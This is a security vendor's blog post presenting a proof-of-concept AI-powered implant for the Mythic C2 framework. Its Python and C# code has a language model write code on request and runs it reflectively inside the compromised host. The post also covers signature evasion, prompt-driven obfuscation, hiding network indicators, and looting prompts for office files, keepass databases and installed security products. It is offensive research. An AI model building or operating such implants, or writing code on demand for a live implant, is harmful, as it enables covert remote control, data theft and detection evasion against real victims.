TL;DR

Introducing malware agents (implants) that uses AI to generate and execute code. Operators can now simply “talk” to their implants, and it will magically execute the requested instructions. For example, an operator could say: “Scan every user’s home folder and pack any office file under 2MB inside a single archive located in C:/test/output.zip“, and the implant would obey. 
This has several advantages:
 

  • Having a more personalized and intuitive way to conduct offensive operations; 
  • Generating unique code at each generation that is more difficult to create signatures for; 
  • Eliminating development efforts that would have been required for simple tasks; 
  • Adding optional AI based code obfuscation on the fly. 

The code discussed in this article can be found here 

 

High-level Introduction 

The cybersecurity industry is currently pushing artificial intelligence in every part of the defensive landscape to facilitate the life of analysts, incident responders, and defenders alike. This shift has become a major advantage for the blue team since it dramatically reduces the efforts and skills required for day-to-day operations. 
The same frame of mind can be applied to offensive security, but many of the tool sets available for operators lacked this edge, until now. I will attempt to integrate AI into a particular type of malware: implants. This type of malware is specifically designed to control a system remotely, as covertly as possible.
 

 

Technical Introduction 

During the lifecycle of an agent/implant, we frequently find ourselves having to develop new commands to adapt to a given operational need.
Certain capabilities such as Beacon Object Files (BOF) execution, reflective execution of assemblies or unmanaged PEs, have made it possible to centralize execution capacity and externalize command development. But this requires the corresponding loader to be embedded in the implant (COFF loader for example), which can increase the level of detection depending on the implementation.
Some C2s, such as Mythic, allow their implants to load commands dynamically, so they don’t have to be embedded beforehand. For example, Mythic’s Python agent “Medusa” from the excellent @ajpc500 features this ability to load external commands via the load command.
However, the number of available commands in the Medusa agent is limited, so the operator is required to add new commands depending on current operational needs, such as probing a TCP port or retrieving a file from a URL.
What if you could directly “talk” to your implant, so that the command could be “coded” on the fly, without having to be developed beforehand?

 

Proof of Concept 

To get started, let’s create at least 2 PoCs in languages commonly used in offensive contexts. The PoCs can later be integrated into Mythic’s implants Medusa (Python) and Apollo (C#). 
For our proof of concept, we’re going to create a program (in both languages) that performs the following workflow:
 

[Getting the prompt from user] 
[Building the full prompt with additional details and constraints] 
[Asking AI through API to generate code] 
[Sanitizing output] 
[Verifying if code is syntactically valid] 
[Execute reflectively the generated code] 
[Prints output to stdout]

 

This can be summarized by the following diagram: 

 

Prompt template 

The program embedded a prompt template with which it will build the final prompt based on user input.
Here is the Python version of the prompt template:
 

I am going to give you an order, and you will answer only by using python code.
For example, if I ask you to list a system folder, you will write python code that list the system folder and prints the output.    
Constraints:
- The python code will be running on a {platform.system()} system
- Always print the result if there is one. If your result is a list, print every element, one by line.
- Use only native python module (no pip install)
The order is: [insert user prompt here]

Note: The prompt dynamically recovers the type of OS it’s running by doing  platform.system(), so that the code can seamlessly adapt to the system context. For example, being on Windows allows you to extensively use ctypes to interact with the WinAPI, and avoid using system commands. 

 

Python Version 

The following Python code implements the workflow described above:

import os, sys, ast, json, platform, http.client

# Argument handling
# [redacted for simplicity]

# Define base prompt
# [redacted for simplicity]

# OpenAI API host and endpoint
HOST = "api.openai.com"
ENDPOINT = "/v1/chat/completions"
MODEL  = 'gpt-4o-mini' # cheap and efficient model
API_KEY = "[API key here]"

# Function to send a request to OpenAI API
def send_prompt(prompt, model=MODEL):
    # Prepare request data
    headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {API_KEY}"
    }
    payload = json.dumps({
        "model": model,
        "messages": [{"role": "user", "content": prompt}],
        "temperature": 0.2  # low temperature for straight answer, less halucination, better for coding
    })

    # Establish connection and send request
    conn = http.client.HTTPSConnection(HOST)
    conn.request("POST", ENDPOINT, body=payload, headers=headers)

    # Get response
    response = conn.getresponse()
    if response.status != 200:
        print(f"Error: Received status code {response.status}")
        print(response.read().decode())
    data = response.read().decode()
    conn.close()

    # Return generated code 
    if data:
        response_json = json.loads(data)
        return response_json["choices"][0]["message"]["content"]
    else: 
        return str() # code will be verified later before execution

Demo 

Issuing some prompts on a Linux system. 

The full code can be found here. 

 

C# Version 

The C# version was a little more complex to achieve in-process reflective compilation and execution. 
Note
: In this context, “in-process” means that the execution stays in the current process and does not spawn any (sub)process, and “reflective” means compiling/executing code from a byte array in memory, without touching the disk. 
Points worth mentioning:
 

  • The (reflective) compilation is done using the Microsoft Roslyn API; 
  • The (reflective) execution is done with Assembly.Load (this could be done better). 
// [imports, redacted for simplicity]

namespace RoslynCompileAndExecute
{
    class Program
    {
        static string SanitizeSourceCode(string sourceCode)
        {
            // [function code redacted for simplicity]
        }

        // Main
        static void Main(string[] args)
        {

            // Argument handling
            // [redacted for simplicity]

            // Build the main prompt
            // [redacted for simplicity]

            // Configure ChatGPT request (set your API key here)
            string apiKey = "[redacted]"; 
            string url = "https://api.openai.com/v1/chat/completions";
            string jsonRequestBody = $@"{{
                ""model"": ""gpt-4o-mini"",
                ""temperature"": 0.2,
                ""messages"": [
                    {{ ""role"": ""user"", ""content"": ""{escapedprompt}"" }}
                ]
            }}";

            // Create the HTTP request 
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
            request.Method = "POST";
            request.ContentType = "application/json";
            request.Headers["Authorization"] = "Bearer " + apiKey;

            // Write the request body
            using (var streamWriter = new StreamWriter(request.GetRequestStream()))
            {
                streamWriter.Write(jsonRequestBody);
                streamWriter.Flush();
            }

            // Get and read the response
            string responseContent;
            using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
            {
                using (var streamReader = new StreamReader(response.GetResponseStream()))
                {
                    responseContent = streamReader.ReadToEnd();
                }
            }

            // Deserialize the JSON response to extract the generated code
            ChatCompletionResponse chatResponse;
            using (var ms = new MemoryStream(System.Text.Encoding.UTF8.GetBytes(responseContent)))
            {
                var serializer = new DataContractJsonSerializer(typeof(ChatCompletionResponse));
                chatResponse = (ChatCompletionResponse)serializer.ReadObject(ms);
            }

            // The generated C# code 
            string sourceCode = chatResponse.Choices[0].Message.Content;

            // Sanitize the source code
            sourceCode = SanitizeSourceCode(sourceCode);

            // Parse the source code into a syntax tree
            SyntaxTree syntaxTree = CSharpSyntaxTree.ParseText(sourceCode);

            // Prepare references required for compilation.
            string assemblyPath = Path.GetDirectoryName(typeof(object).Assembly.Location);
            var references = new List()
            {
                // [redacted for simplicity]
            };

            // Create a Roslyn compilation for a dynamically linked library
            CSharpCompilation compilation = CSharpCompilation.Create(
                "DynamicAssembly",
                new[] { syntaxTree },
                references,
                new CSharpCompilationOptions(OutputKind.DynamicallyLinkedLibrary));

            // Emit the compiled assembly to a MemoryStream (our byte buffer)
            using (var ms = new MemoryStream())
            {
                EmitResult result = compilation.Emit(ms);
                if (!result.Success)
                {
                    foreach (Diagnostic diagnostic in result.Diagnostics)
                    {
                        // If there are compilation errors, output them and exit.
                        Console.Error.WriteLine(diagnostic.ToString());
                    }
                    return;
                }

                // Get the compiled assembly as a byte array.
                byte[] assemblyBytes = ms.ToArray();

                // Load the assembly from the byte array using reflection.
                Assembly assembly = Assembly.Load(assemblyBytes);

                // Find the type and method to execute.
                Type dynamicType = assembly.GetType("DynamicProgram");
                MethodInfo executeMethod = dynamicType?.GetMethod("Execute", BindingFlags.Public | BindingFlags.Static);
                if (executeMethod != null)
                {
                    // Execute method
                    executeMethod.Invoke(null, null);
                }
                else
                {
                    Console.Error.WriteLine("Method 'Execute' not found");
                }
            }
        }
    }
}

  Demo: 

Listing files of a directory. 

Spawning mspaint.exe in a detached process. 

The full code can be found here 

 

Integrating the prompt Command in Mythic’s Medusa Agent 

To add a command named “prompt” to a Medusa implant, one needs to add the following files:  

  • The implant-side code:
    [Mythic folder]/InstalledServices/medusa/medusa/agent_code/prompt.py 
  • The server-side code:
    [Mythic folder]/InstalledServices/medusa/medusa/mythic/agent_functions/prompt.py 

Note: If you wish to create a new command from scratch, you can start by copying cat.py from those folders to have basic working code. 

Once you are finished editing your code, restart the Medusa container:
[Mythic folder]/mythic-cli restart medusa


Check the logs to check if any errors occurred:
[Mythic folder]/mythic-cli logs medusa


From the running implant, simply run:
  load prompt 

Note: When developing the code for a command, there’s no need to unload then load the command to reload the code, simply run load. 

 

Command Design 

First, we’re going to improve our communication model: 

 

Advantages of this model compared to the previous PoC  (implant <-> API  vs.  C2 <-> API)

  • API key cannot be recovered from implant code (in case of artifact compromise); 
  • API domain cannot be used as a network indicator. For example, it would be strange to have a system process communicating with api.openai.com (and is not supposed to); 
  • More practical for dev/working on offline Windows VMs, since the C2 is the one making network requests to the API. 

 

Command’s Options 

  • model: Being able to choose the GPT model that will be generating code. 
  • cmdless: Prevents generated code from issuing system/shell commands or spawn (sub)processes. This adds the following constraint to the main prompt: “Do not use any system shell command, or any local system executables“. 
  • obfuscation: Allows on the fly obfuscation of the defined function/class/variable names. This adds the following constraint to the main prompt: “For any variable or function or class, or object you define, name it by using words that are fruit, animal, or plant. Make sure to use words without any special characters“. 

Options available when running the prompt command

 

Medusa Constraints 

My initial implementation of Python code execution using the native exec function mixed with the way Medusa works, produced improper handling of function and class definitions.
The issue is that when executing Python code in Medusa via the native
exec function, all the functions/classes defined in the code are unable to retrieve imports/variables/functions/classes that are defined outside their body.
This same execution implementation (with the Python
exec function) is used in the Medusa’s built-in load_script.py  command, I’ve noticed the issue in the past without understanding why.
For example, if you execute the following code with Medusa’s
load_script: 

value1 = 1
def add():
    return value1+1
add()

You would get the following error: 

Error when running a function calling an external variable with load_script. 

What I understood is that it does not work with exec because it’s using separate dictionaries for global and local variables, so that functions and classes defined within the executed code were looking only in the global dictionary for variables, while those variables were stored in the local dictionary.
The following code execution implementation circumvent this:
 

# Ensure built-in functions (including __import__) are available
namespace = dict()
namespace['__builtins__'] = __import__('builtins')

# Compile the source code in 'exec' mode
code_obj = compile(generated_code, '', 'exec')

# Use the same dictionary for both globals and locals
eval(code_obj, namespace, namespace)

This approach uses a unified namespace and the same dictionary for both globals and locals, making sure that all definitions such as variables, modules, and even built-in functions explicitly added with namespace['__builtins__'] = __import__('builtins') stay accessible throughout the executed code.   

 

Implant-side Code 

As all the work is delegated server-side (communication with API and code processing), the implant-side command code is less than 20 lines (without comments). In a nutshell, this makes it possible to have an extra-powerful feature with an extra-light code footprint: 

def prompt(self, task_id, prompt, model, cmdless, obfuscation):
    import io, ast, sys

    # prompt has been replaced by generated Python code by the server (this is a solution to send data to the agent from the server)
    generated_code = prompt

    # verifying (again) if the code is correct
    try:
        ast.parse(generated_code)  
    except Exception as e:
        return f"Execution failed: {e}"
    
    # Get output
    output_capture = io.StringIO()
    sys.stdout = output_capture

    #exec(generated_code) # OLD
    # better exec code that support external variables/classes within classes and function:
    namespace = dict()
    # Ensure built-in functions (including __import__) are available
    namespace['__builtins__'] = __import__('builtins')
    # Compile the source code in 'exec' mode
    code_obj = compile(generated_code, '', 'exec')
    # Use the same dictionary for both globals and locals
    eval(code_obj, namespace, namespace)

    # Get the output
    sys.stdout = sys.__stdout__
    captured_output = output_capture.getvalue()

    # display result
    return f"Output:\n\n{captured_output}"

 

Demo 

With that being said, here’s a demo of the prompt command:

The full code can be found here.   

 

Crashsafe Command Handling 

Some code generations may be incorrect. In this case, the error will be returned, and the implant will remain alive. Here’s an example of the submission of the same prompt, first generating incorrect code causing a crash, then valid code execution on the second attempt: 

Multiple attempts at the same prompt, without risk of crashing the implant. 

 

Pros, Cons and Limitations 

Pros  [+]

  • Having a more personalized and intuitive way to operate. For example, being able to say: “scan every user’s home folder, and pack any office file under 2MB inside a single archive located in C:/test/output.zip” (this kind of prompt can significantly speed up the loot phase); 
  • Generate unique code at each generation (more difficult to sign); 
  • No development efforts for simple tasks; 
  • Optional AI based code obfuscation on the fly; 
  • Extra-light implant-side code; 
  • Possibility to include live translation, in the case of operating on a host in a foreign language; 
  • The current implementation of the prompt command in Medusa is crashsafe. If the generated code crashes, the implant remains alive.

Cons  [-]

  • It’s so skid-friendly it terrifies me; 
  • Using an implant with AI capability has a higher ecological impact than a traditional implant. 

Limitations [!]

  • The current AI limitations in and of itself, although it will continuously improve. At the time of writing this article, we cannot expect to ask overly complex operations, or to produce elite opsec/stealth code; 
  • There is currently no operator validation before the generated code is executed. It would be nice to be able to pause and edit before shooting the code; 
  • If you use one of the following models: gpt-4o, gpt-4o-mini, o1-mini, each issued command can approximately cost between 0,00003$ and 0.01$ (depending on its input/output complexity) at the time of writing this article. 

 

Example of Useful Prompts 

Some things that can sometimes be long to achieve with standard implant commands (such as ls) while avoiding system/shell commands: 

  • Enumerate the users who do not have the following folders empty: Desktop, Downloads“. This can be useful when there are a many users on a host/share; 
  • Give me the list of browsers used by each system user by looking at their folders in AppData“; 
  • List all the security solutions present on the system by looking at the program folders. Quickly describes each security solution observed, by giving a short text about what they are“; 
  • Crawl the remote share \\test\share to find any keepass file“; 
  • Fetch this archive at https://… and uncompress it in the C:\test folder“. 

 

Conclusion 

This feature makes it possible to generate personalized code on the fly with no development effort. As security solutions evolve and start using AI increasingly, malware will also follow this branch and integrate intelligence into its core. Although the code provided in this article is only proof of concept, it is likely that some C2s will incorporate this capability in the future.   

 

Credits 

  • OpenAI’s ChatGPT which is currently used by the implant in this article, but that also changed my life: https://chatgpt.com  

 

Author

jdi

GoSecure Titan® Managed Extended Detection & Response (MXDR)​

GoSecure Titan® Managed Extended Detection & Response (MXDR)​ Foundation

GoSecure Titan® Vulnerability Management as a Service (VMaaS)

GoSecure Titan® Managed Security Information & Event Monitoring (Managed SIEM)

GoSecure Titan® Managed Perimeter Defense​ (MPD)

GoSecure Titan® Inbox Detection and Response (IDR)

GoSecure Titan® Secure Email Gateway (SEG)

GoSecure Titan® Threat Modeler

GoSecure Titan® Identity

GoSecure Titan® Platform

GoSecure Professional Security Services

Incident Response Services

Security Maturity Assessment

Privacy Services

PCI DSS Services

Penetration Testing Services​

Security Operations

MicrosoftLogo

GoSecure MXDR for Microsoft

Comprehensive visibility and response within your Microsoft security environment

USE CASES

Cyber Risks

Risk-Based Security Measures

Sensitive Data Security

Safeguard sensitive information

Private Equity Firms

Make informed decisions

Cybersecurity Compliance

Fulfill regulatory obligations

Cyber Insurance

A valuable risk management strategy

Ransomware

Combat ransomware with innovative security

Zero-Day Attacks

Halt zero-day exploits with advanced protection

Consolidate, Evolve & Thrive

Get ahead and win the race with the GoSecure Titan® Platform

24/7 MXDR FOUNDATION

GoSecure Titan® Endpoint Detection and Response (EDR)

GoSecure Titan® Next Generation Antivirus (NGAV)

GoSecure Titan® Security Information & Event Monitoring (SIEM)

GoSecure Titan® Inbox Detection and Reponse (IDR)

GoSecure Titan® Intelligence

OUR SOC

Proactive Defense, 24/7

AICPA SOC Logo - Black

ABOUT GOSECURE

GoSecure is a recognized cybersecurity leader and innovator, pioneering the integration of endpoint, network, and email threat detection into a single Managed Extended Detection and Response (MXDR) service. For over 20 years, GoSecure has been helping customers better understand their security gaps and improve their organizational risk and security maturity through MXDR and Professional Services solutions delivered by one of the most trusted and skilled teams in the industry.

EVENT CALENDAR

LATEST PRESS RELEASE

GOSECURE BLOG

SECURITY ADVISORIES

 24/7 Emergency – (888)-287-5858